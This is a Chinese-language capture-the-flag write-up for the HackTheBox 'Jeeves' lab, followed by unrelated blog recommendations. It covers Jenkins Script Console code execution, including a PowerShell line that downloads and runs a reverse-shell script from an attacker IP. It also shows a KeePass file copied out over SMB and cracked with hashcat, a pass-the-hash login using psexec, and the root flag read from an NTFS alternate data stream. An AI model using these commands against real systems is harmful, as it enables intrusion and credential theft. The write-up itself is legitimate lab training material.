[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Crack+Pass-the-Hash+(NTFS)ADS攻击

信息收集

IP Address Opening Ports
10.10.10.63 TCP:80,135,445,50000

$ nmap -p- 10.10.10.63 --min-rate 1000 -sC -sV -Pn

bash 复制代码
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP 50000 && Jenkins

http://10.10.10.63:50000/

$ feroxbuster --url http://10.10.10.63:50000/ --filter-status 404

Manage Jenkins -> Script Console

println "powershell.exe /c whoami /priv".execute().text

println "powershell.exe /c iex (New-Object Net.WebClient).DownloadString('http://10.10.16.17/Invoke-PowerShellTcp.ps1')".execute().text

User.txt

e3232272596fb47950d59c4cf1e7066a

权限提升 && KeePass

PS C:\Users\kohsuke\Documents> dir C:\Users\kohsuke\Documents

$ impacket-smbserver share /tmp/ -smb2support

PS C:\Users\kohsuke\Documents> copy C:\Users\kohsuke\Documents\CEH.kdbx \\10.10.16.17\share

$ keepass2john CEH.kdbx >CEH.hash

$ hashcat -m 13400 CEH.hash /usr/share/wordlists/rockyou.txt --user

k e e p a s s keepass keepass2 60000 1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091 393c97beafd8a820db9142a6a94f03f6b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcffcb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1

$ kpcli -kdb CEH.kdbx

复制代码
kpcli:/> find .
Searching for "." ...
 - 8 matches found and placed into /_found/
Would you like to list them now? [y/N] 
=== Entries ===
0. Backup stuff                                                           
1. Bank of America                                   www.bankofamerica.com
2. DC Recovery PW                                                         
3. EC-Council                               www.eccouncil.org/programs/cer
4. It's a secret                                 localhost:8180/secret.jsp
5. Jenkins admin                                            localhost:8080
6. Keys to the kingdom                                                    
7. Walmart.com                                             www.walmart.com

kpcli:/> show -f 0

 Path: /CEH/
Title: Backup stuff
Uname: ?
 Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
  URL: 
Notes: 

kpcli:/> show -f 1

 Path: /CEH/
Title: Bank of America
Uname: Michael321
 Pass: 12345
  URL: https://www.bankofamerica.com
Notes: 

kpcli:/> show -f 2

 Path: /CEH/
Title: DC Recovery PW
Uname: administrator
 Pass: S1TjAtJHKsugh9oC4VZl
  URL: 
Notes: 

kpcli:/> show -f 3

 Path: /CEH/
Title: EC-Council
Uname: hackerman123
 Pass: pwndyouall!
  URL: https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
Notes: Personal login

kpcli:/> show -f 4

 Path: /CEH/
Title: It's a secret
Uname: admin
 Pass: F7WhTrSFDKB6sxHU1cUn
  URL: http://localhost:8180/secret.jsp
Notes: 

kpcli:/> show -f 5

 Path: /CEH/
Title: Jenkins admin
Uname: admin
 Pass: 
  URL: http://localhost:8080
Notes: We don't even need creds! Unhackable! 

kpcli:/> show -f 6

 Path: /CEH/
Title: Keys to the kingdom
Uname: bob
 Pass: lCEUnYPjNfIuPZSzOySA
  URL: 
Notes: 

kpcli:/> show -f 7

 Path: /CEH/
Title: Walmart.com
Uname: anonymous
 Pass: Password
  URL: http://www.walmart.com
Notes: Getting my shopping on

Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

使用NTLM哈希登录

$ impacket-psexec [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

C:\Users\Administrator\Desktop> dir /R

C:\Users\Administrator\Desktop> powershell.exe /c Get-Content -Path .\hm.txt -Stream root.txt

Root.txt

afbc5bd4b615a60648cec41c6ac92530

相关推荐
吃旺旺雪饼的小男孩7 分钟前
Ubuntu 22.04 安装和运行 EDK2 超详细教程
linux·运维·ubuntu
阿政一号14 分钟前
Linux进程间通信:【目的】【管道】【匿名管道】【命名管道】【System V 共享内存】
linux·运维·服务器·进程间通信
方渐鸿24 分钟前
【2025】快速部署安装docker以及项目搭建所需要的基础环境(mysql、redis、nginx、nacos)
java·运维·docker·持续部署·dockercompse
qq_54702617927 分钟前
Elasticsearch 正排索引
大数据·elasticsearch·jenkins
小哈里40 分钟前
【运维】云计算的发展历程,云原生时代的运维理念&工具技术栈,高可用系统的云运维 —— 以K8S集群调度算法与命令为例
运维·云原生·kubernetes·云计算·架构设计
A charmer1 小时前
【Linux】文件系统知识梳理:从磁盘硬件到文件管理
linux·运维·服务器
Cynthia的梦1 小时前
Linux学习-Linux进程间通信(IPC)聊天程序实践指南
linux·运维·学习
小林熬夜学编程2 小时前
【高并发内存池】第八弹---脱离new的定长内存池与多线程malloc测试
c语言·开发语言·数据结构·c++·算法·哈希算法
敲上瘾3 小时前
高并发内存池(二):Central Cache的实现
linux·服务器·c++·缓存·哈希算法
安顾里3 小时前
Linux命令-tar
linux·运维·服务器